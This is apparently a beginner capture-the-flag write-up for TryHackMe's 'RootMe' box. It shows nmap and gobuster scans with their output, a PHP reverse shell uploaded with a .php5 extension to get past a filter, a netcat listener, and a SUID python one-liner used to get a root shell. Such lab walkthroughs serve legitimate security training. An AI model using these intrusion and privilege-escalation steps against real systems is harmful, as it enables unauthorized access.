RootMe

A ctf for beginners, can you root me?

TryHackMe - RootMe Created by ReddyyZ

Scanning (IP : 10.10.6.204)

1. NMAP

> nmap -sC -sV 10.10.6.204 > nmap.txt

Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-08 05:43 EDT
Nmap scan report for 10.10.54.136
Host is up (0.21s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4a:b9:16:08:84:c2:54:48:ba:5c:fd:3f:22:5f:22:14 (RSA)
|   256 a9:a6:86:e8:ec:96:c3:f0:03:cd:16:d5:49:73:d0:82 (ECDSA)
|_  256 22:f6:b5:a6:54:d9:78:7c:26:03:5a:95:f3:f9:df:cd (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: HackIT - Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.25 seconds

2. GoBuster

> gobuster dir -u http://10.10.6.204 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt > gobuster.txt

===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.54.136
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/09/08 05:48:11 Starting gobuster in directory enumeration mode
===============================================================
/uploads              (Status: 301) [Size: 314] [--> http://10.10.54.136/uploads/]
/css                  (Status: 301) [Size: 310] [--> http://10.10.54.136/css/]    
/js                   (Status: 301) [Size: 309] [--> http://10.10.54.136/js/]     
/panel                (Status: 301) [Size: 312] [--> http://10.10.54.136/panel/]  

[!] Keyboard interrupt detected, terminating.
===============================================================
2021/09/08 06:11:43 Finished
===============================================================

Upload Malacious PHP FIile

Some Php extensions are blacklisted but .php5 extension works here. Php-reverse shell can be found /usr/share/webshells/php/php-reverse-shell.php in Kali Linux. Change IP to your IP and open a netcat listner on port 1234. nc -lnvp 1234 . Now, You get the reverse shell and can get user.txt.

Privileges escalations (root.txt)

I upload Linpeas.sh on Target Box to get the information about system. Then, I found a weird SUID file /usr/bin/python . Then I search for python on GTFOBins. (python -c 'import os; os.execl("/bin/sh", "sh", "-p")'). Now, just cat the /root/root.txt

PreviousOverpass NextVulnversity

Last updated 4 years ago

Was this helpful?